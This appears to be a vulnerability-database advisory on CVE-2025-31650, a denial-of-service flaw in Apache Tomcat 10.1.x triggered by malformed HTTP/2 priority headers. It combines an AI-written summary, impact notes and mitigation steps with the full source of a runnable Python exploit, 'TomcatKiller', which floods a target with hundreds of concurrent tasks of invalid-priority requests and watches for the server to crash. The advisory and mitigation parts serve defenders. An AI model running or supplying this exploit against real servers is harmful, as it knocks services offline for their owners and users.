Apache Tomcat 10.1.39 - Denial of Service (DoS)
Apache Tomcat 10.1.39 - Denial of Service (DoS)
AI Analysis
Technical Summary
The security threat concerns a Denial of Service (DoS) vulnerability identified as CVE-2025-31650 affecting Apache Tomcat versions 10.1.10 through 10.1.39. The vulnerability exploits a flaw in the handling of HTTP/2 priority headers. Specifically, the exploit sends malformed or invalid HTTP/2 priority headers with unusual or out-of-range values, causing a memory leak in the Tomcat server. This memory leak can eventually lead to resource exhaustion, resulting in server crashes or unresponsiveness. The exploit requires the target server to support HTTP/2 and be running a vulnerable Tomcat version. The provided exploit code is written in Python 3 and uses asynchronous HTTP/2 requests via the httpx library to flood the server with requests containing invalid priority headers. The attack is designed to be highly concurrent, using multiple asynchronous tasks to maximize the number of requests sent in a short period. The exploit monitors the target server's availability by attempting TCP connections and reports when the server becomes unreachable, indicating a successful DoS condition. The attack does not require authentication or user interaction, and it targets the server remotely over the network. The exploit code also includes a variety of malformed priority header values to trigger the vulnerability. No official patch links are provided, and no known exploits in the wild have been reported yet. The vulnerability impacts the availability of the affected Tomcat servers by causing crashes or denial of service through memory exhaustion triggered by malformed HTTP/2 priority headers.
Potential Impact
For European organizations, this vulnerability poses a significant risk to any infrastructure relying on Apache Tomcat 10.1.x servers with HTTP/2 enabled. Tomcat is widely used in enterprise web applications, middleware, and cloud services. A successful DoS attack could disrupt critical business applications, leading to service outages, loss of productivity, and potential financial losses. Organizations in sectors such as finance, government, healthcare, and telecommunications, which often use Tomcat for internal and external-facing services, could experience degraded service availability or complete downtime. The attack's remote nature and lack of authentication requirements mean that threat actors can exploit this vulnerability from anywhere, increasing the risk of widespread disruption. Additionally, the memory leak nature of the vulnerability may complicate detection and mitigation, as the server may degrade gradually before crashing, potentially evading some monitoring systems. This could also increase the time to recovery and incident response. The absence of known exploits in the wild currently provides a window for proactive mitigation, but the availability of public exploit code raises the risk of imminent exploitation attempts.
Mitigation Recommendations
1. Immediate upgrade: Organizations should upgrade Apache Tomcat to a version later than 10.1.39 once an official patch is released. In the absence of a patch, consider downgrading to a non-vulnerable version or disabling HTTP/2 support if feasible. 2. HTTP/2 filtering: Deploy network-level controls such as Web Application Firewalls (WAFs) or reverse proxies that can inspect and filter malformed HTTP/2 priority headers to block suspicious traffic before it reaches the Tomcat server. 3. Rate limiting: Implement strict rate limiting on incoming HTTP/2 connections and requests to reduce the impact of flooding attacks. 4. Monitoring and alerting: Enhance monitoring of Tomcat server memory usage, response times, and availability. Use tools like VisualVM or analyze catalina.out logs for OutOfMemoryError or other memory-related exceptions. 5. Network segmentation: Isolate critical Tomcat servers behind internal firewalls and restrict access to trusted networks to reduce exposure. 6. Incident response preparation: Develop and test incident response plans specifically for DoS scenarios affecting Tomcat services. 7. Disable HTTP/2 if not required: If HTTP/2 is not essential for the application, disable it to eliminate the attack vector. 8. Vendor communication: Stay in contact with Apache Tomcat maintainers for timely patch releases and advisories.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Sweden, Belgium, Poland, Finland
Indicators of Compromise
- exploit-code: # Exploit Title: Apache Tomcat 10.1.39 - Denial of Service (DOS) # Author: Abdualhadi khalifa # CVE: CVE-2025-31650 import httpx import asyncio import random import urllib.parse import sys import socket from colorama import init, Fore, Style init() class TomcatKiller: def __init__(self): self.success_count = 0 self.error_count = 0 self.invalid_priorities = [ \\\"u=-1, q=2\\\", \\\"u=4294967295, q=-1\\\", \\\"u=-2147483648, q=1.5\\\", \\\"u=0, q=invalid\\\", \\\"u=1/0, q=NaN\\\", \\\"u=1, q=2, invalid=param\\\", \\\"\\\", \\\"u=1, q=1, u=2\\\", \\\"u=99999999999999999999, q=0\\\", \\\"u=-99999999999999999999, q=0\\\", \\\"u=, q=\\\", \\\"u=1, q=1, malformed\\\", \\\"u=1, q=, invalid\\\", \\\"u=-1, q=4294967295\\\", \\\"u=invalid, q=1\\\", \\\"u=1, q=1, extra=\\\", \\\"u=1, q=1; malformed\\\", \\\"u=1, q=1, =invalid\\\", \\\"u=0, q=0, stream=invalid\\\", \\\"u=1, q=1, priority=recursive\\\", \\\"u=1, q=1, %invalid%\\\", \\\"u=0, q=0, null=0\\\", ] async def validate_url(self, url): try: parsed_url = urllib.parse.urlparse(url) if not parsed_url.scheme or not parsed_url.hostname: raise ValueError(\\\"Invalid URL format. Use http:// or https://\\\") host = parsed_url.hostname port = parsed_url.port if parsed_url.port else (443 if parsed_url.scheme == \\\'https\\\' else 80) return host, port except Exception: print(f\\\"{Fore.RED}Error: Invalid URL. Use http:// or https:// format.{Style.RESET_ALL}\\\") sys.exit(1) async def check_http2_support(self, host, port): async with httpx.AsyncClient(http2=True, verify=False, timeout=5, limits=httpx.Limits(max_connections=1000)) as client: try: response = await client.get(f\\\"https://{host}:{port}/\\\", headers={\\\"user-agent\\\": \\\"TomcatKiller\\\"}) if response.http_version == \\\"HTTP/2\\\": print(f\\\"{Fore.GREEN}HTTP/2 supported! Proceeding ...{Style.RESET_ALL}\\\") return True else: print(f\\\"{Fore.YELLOW}Error: HTTP/2 not supported. This exploit requires HTTP/2.{Style.RESET_ALL}\\\") return False except Exception: print(f\\\"{Fore.RED}Error: Could not connect to {host}:{port}.{Style.RESET_ALL}\\\") return False async def send_invalid_priority_request(self, host, port, num_requests, task_id): async with httpx.AsyncClient(http2=True, verify=False, timeout=0.3, limits=httpx.Limits(max_connections=1000)) as client: url = f\\\"https://{host}:{port}/\\\" for i in range(num_requests): headers = { \\\"priority\\\": random.choice(self.invalid_priorities), \\\"user-agent\\\": f\\\"TomcatKiller-{task_id}-{random.randint(1, 1000000)}\\\", \\\"cache-control\\\": \\\"no-cache\\\", \\\"accept\\\": f\\\"*/*; q={random.random()}\\\", } try: await client.get(url, headers=headers) self.success_count += 1 except Exception: self.error_count += 1 async def monitor_server(self, host, port): while True: try: with socket.create_connection((host, port), timeout=2): print(f\\\"{Fore.YELLOW}Target {host}:{port} is reachable.{Style.RESET_ALL}\\\") except Exception: print(f\\\"{Fore.RED}Target {host}:{port} unreachable or crashed!{Style.RESET_ALL}\\\") break await asyncio.sleep(2) async def run_attack(self, host, port, num_tasks, requests_per_task): print(f\\\"{Fore.GREEN}Starting attack on {host}:{port}...{Style.RESET_ALL}\\\") print(f\\\"Tasks: {num_tasks}, Requests per task: {requests_per_task}\\\") print(f\\\"{Fore.YELLOW}Monitor memory manually via VisualVM or check catalina.out for OutOfMemoryError.{Style.RESET_ALL}\\\") monitor_task = asyncio.create_task(self.monitor_server(host, port)) tasks = [self.send_invalid_priority_request(host, port, requests_per_task, i) for i in range(num_tasks)] await asyncio.gather(*tasks) monitor_task.cancel() total_requests = num_tasks * requests_per_task success_rate = (self.success_count / total_requests * 100) if total_requests > 0 else 0 print(f\\\"\\\\n{Fore.MAGENTA}===== Attack Summary ====={Style.RESET_ALL}\\\") print(f\\\"Target: {host}:{port}\\\") print(f\\\"Total Requests: {total_requests}\\\") print(f\\\"Successful Requests: {self.success_count}\\\") print(f\\\"Failed Requests: {self.error_count}\\\") print(f\\\"Success Rate: {success_rate:.2f}%\\\") print(f\\\"{Fore.MAGENTA}========================={Style.RESET_ALL}\\\") async def main(): print(f\\\"{Fore.BLUE}===== TomcatKiller - CVE-2025-31650 ====={Style.RESET_ALL}\\\") print(f\\\"Developed by: @absholi7ly\\\") print(f\\\"Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers.\\\") print(f\\\"{Fore.YELLOW}Warning: For authorized testing only. Ensure HTTP/2 and vulnerable Tomcat version.{Style.RESET_ALL}\\\\n\\\") url = input(f\\\"{Fore.CYAN}Enter target URL (e.g., https://localhost:8443): {Style.RESET_ALL}\\\") num_tasks = int(input(f\\\"{Fore.CYAN}Enter number of tasks (default 300): {Style.RESET_ALL}\\\") or 300) requests_per_task = int(input(f\\\"{Fore.CYAN}Enter requests per task (default 100000): {Style.RESET_ALL}\\\") or 100000) tk = TomcatKiller() host, port = await tk.validate_url(url) if not await tk.check_http2_support(host, port): sys.exit(1) await tk.run_attack(host, port, num_tasks, requests_per_task) if __name__ == \\\"__main__\\\": try: asyncio.run(main()) print(f\\\"{Fore.GREEN}Attack completed!{Style.RESET_ALL}\\\") except KeyboardInterrupt: print(f\\\"{Fore.YELLOW}Attack interrupted by user.{Style.RESET_ALL}\\\") sys.exit(0) except Exception as e: print(f\\\"{Fore.RED}Unexpected error: {e}{Style.RESET_ALL}\\\") sys.exit(1)
Apache Tomcat 10.1.39 - Denial of Service (DoS)
Description
Apache Tomcat 10.1.39 - Denial of Service (DoS)
AI-Powered Analysis
Technical Analysis
The security threat concerns a Denial of Service (DoS) vulnerability identified as CVE-2025-31650 affecting Apache Tomcat versions 10.1.10 through 10.1.39. The vulnerability exploits a flaw in the handling of HTTP/2 priority headers. Specifically, the exploit sends malformed or invalid HTTP/2 priority headers with unusual or out-of-range values, causing a memory leak in the Tomcat server. This memory leak can eventually lead to resource exhaustion, resulting in server crashes or unresponsiveness. The exploit requires the target server to support HTTP/2 and be running a vulnerable Tomcat version. The provided exploit code is written in Python 3 and uses asynchronous HTTP/2 requests via the httpx library to flood the server with requests containing invalid priority headers. The attack is designed to be highly concurrent, using multiple asynchronous tasks to maximize the number of requests sent in a short period. The exploit monitors the target server's availability by attempting TCP connections and reports when the server becomes unreachable, indicating a successful DoS condition. The attack does not require authentication or user interaction, and it targets the server remotely over the network. The exploit code also includes a variety of malformed priority header values to trigger the vulnerability. No official patch links are provided, and no known exploits in the wild have been reported yet. The vulnerability impacts the availability of the affected Tomcat servers by causing crashes or denial of service through memory exhaustion triggered by malformed HTTP/2 priority headers.
Potential Impact
For European organizations, this vulnerability poses a significant risk to any infrastructure relying on Apache Tomcat 10.1.x servers with HTTP/2 enabled. Tomcat is widely used in enterprise web applications, middleware, and cloud services. A successful DoS attack could disrupt critical business applications, leading to service outages, loss of productivity, and potential financial losses. Organizations in sectors such as finance, government, healthcare, and telecommunications, which often use Tomcat for internal and external-facing services, could experience degraded service availability or complete downtime. The attack's remote nature and lack of authentication requirements mean that threat actors can exploit this vulnerability from anywhere, increasing the risk of widespread disruption. Additionally, the memory leak nature of the vulnerability may complicate detection and mitigation, as the server may degrade gradually before crashing, potentially evading some monitoring systems. This could also increase the time to recovery and incident response. The absence of known exploits in the wild currently provides a window for proactive mitigation, but the availability of public exploit code raises the risk of imminent exploitation attempts.
Mitigation Recommendations
1. Immediate upgrade: Organizations should upgrade Apache Tomcat to a version later than 10.1.39 once an official patch is released. In the absence of a patch, consider downgrading to a non-vulnerable version or disabling HTTP/2 support if feasible. 2. HTTP/2 filtering: Deploy network-level controls such as Web Application Firewalls (WAFs) or reverse proxies that can inspect and filter malformed HTTP/2 priority headers to block suspicious traffic before it reaches the Tomcat server. 3. Rate limiting: Implement strict rate limiting on incoming HTTP/2 connections and requests to reduce the impact of flooding attacks. 4. Monitoring and alerting: Enhance monitoring of Tomcat server memory usage, response times, and availability. Use tools like VisualVM or analyze catalina.out logs for OutOfMemoryError or other memory-related exceptions. 5. Network segmentation: Isolate critical Tomcat servers behind internal firewalls and restrict access to trusted networks to reduce exposure. 6. Incident response preparation: Develop and test incident response plans specifically for DoS scenarios affecting Tomcat services. 7. Disable HTTP/2 if not required: If HTTP/2 is not essential for the application, disable it to eliminate the attack vector. 8. Vendor communication: Stay in contact with Apache Tomcat maintainers for timely patch releases and advisories.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52318
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Apache Tomcat 10.1.39 - Denial of Service (DoS)
# Exploit Title: Apache Tomcat 10.1.39 - Denial of Service (DOS) # Author: Abdualhadi khalifa # CVE: CVE-2025-31650 import httpx import asyncio import random import urllib.parse import sys import socket from colorama import init, Fore, Style init() class TomcatKiller: def __init__(self): self.success_count = 0 self.error_count = 0 self.invalid_priorities = [ \\\"u=-1, q=2\\\", \\\"u=4294967295, q=-1\\\", \\\"u=-2147483648, q=1.5\... (6128 more characters)
Threat ID: 68489c8082cbcead92620d20
Added to database: 6/10/2025, 8:58:40 PM
Last enriched: 6/11/2025, 8:15:53 AM
Last updated: 8/18/2025, 4:08:45 AM
Views: 30
Related Threats
Malicious PyPI and npm Packages Discovered Exploiting Dependencies in Supply Chain Attacks
HighResearcher to release exploit for full auth bypass on FortiWeb
HighTop Israeli Cybersecurity Director Arrested in US Child Exploitation Sting
HighEncryptHub abuses Brave Support in new campaign exploiting MSC EvilTwin flaw
MediumU.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.